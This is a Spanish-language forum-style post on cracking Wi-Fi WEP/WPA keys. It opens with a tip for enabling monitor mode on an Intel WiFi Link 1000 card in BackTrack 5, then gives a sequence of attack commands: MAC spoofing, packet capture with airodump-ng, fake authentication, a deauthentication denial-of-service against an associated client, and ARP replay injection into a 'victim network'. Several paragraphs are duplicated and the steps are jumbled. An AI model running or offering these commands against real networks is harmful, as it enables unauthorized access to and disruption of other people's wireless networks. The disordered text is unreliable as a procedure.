HACK CRACK DESCIFRAR CLAVES WIFI WEP WPA WPA2
Hola les dire la forma de hacer funcionar en modo monitor la intel wifi link 1000 bgn en backtrack 5 r1 , ya que airmon-ng no la detecta por algun motivo.
vale lo primero es ir a esta direccion con una shell /pentest/wireless/aircrack-ng/scripts
luego tendriamos que poner airmon-zc start wlan0 y ya esta con este scripts funciona perfectamente.
Pongo esto aqui por que e estado un monton de dias buscando si encontrar la solucion hasta hoy que de casualidad lo descubri y a muchisima gente tiene ese problema y nadie save la solucion, asi que ya que descubri como hacerla funcionar la comparto con vosotros.
creo que tambien funciona con la centrino-N 1000 por que es el mismo chits que la wifi link 1000bgn
un saludo.
vale lo primero es ir a esta direccion con una shell /pentest/wireless/aircrack-ng/scripts
luego tendriamos que poner airmon-zc start wlan0 y ya esta con este scripts funciona perfectamente.
Pongo esto aqui por que e estado un monton de dias buscando si encontrar la solucion hasta hoy que de casualidad lo descubri y a muchisima gente tiene ese problema y nadie save la solucion, asi que ya que descubri como hacerla funcionar la comparto con vosotros.
creo que tambien funciona con la centrino-N 1000 por que es el mismo chits que la wifi link 1000bgn
un saludo.
2
macchanger -m 00:11:22:33:44:55 wlan0
3. Buscamos las redes disponibles
airodump-ng mon0
captura
airodump-ng -w maestre --bssid 00:11:22:33:44:55 -c 11 mon0
CONECTARSE Y PAQUETEARLA
aireplay-ng -1 30 -o 1 -e (essid) -a (bssid) -h 00:11:22:33:44:55 wlan0
DESPUES DDOS PARA PAQUETEARLA MAS
Ataque DoS (Denegación de Servicio):
Muchos de vosotros ya sabéis lo que es un ataque de Denegación de Servicio, si no lo sabes entra aquí DENEGACIÓN DE SERVICIO que te lo explica muy bien. De lo que estoy seguro, es de que muchos de vosotros ni siquiera sabíais que se podían hacer ataques DoS a clientes asociados a puntos de acceso (AP). Pongamos un BSSID (00:89:4F:D2:15:A3), un cliente asociado con MAC (00:14:D8:7F:B1:96) y una tarjeta con chipset Zydas. El ataque sería así:
Muchos de vosotros ya sabéis lo que es un ataque de Denegación de Servicio, si no lo sabes entra aquí DENEGACIÓN DE SERVICIO que te lo explica muy bien. De lo que estoy seguro, es de que muchos de vosotros ni siquiera sabíais que se podían hacer ataques DoS a clientes asociados a puntos de acceso (AP). Pongamos un BSSID (00:89:4F:D2:15:A3), un cliente asociado con MAC (00:14:D8:7F:B1:96) y una tarjeta con chipset Zydas. El ataque sería así:
Código:
aireplay-ng -0 0 -a 00:89:4F:D2:15:A3 -c 00:14:D8:7F:B1:96 eth1
______ dejamos un rato y después:
inyectar bn después cancelarla cuando coja 1 paquete
Ahora vamos a inyectar datos a la red víctima:
dijo:
aireplay-ng -3 -b 00:11:22:33:44:55 -h 55:44:33:22:11:00 mon0
si captura cancelamos..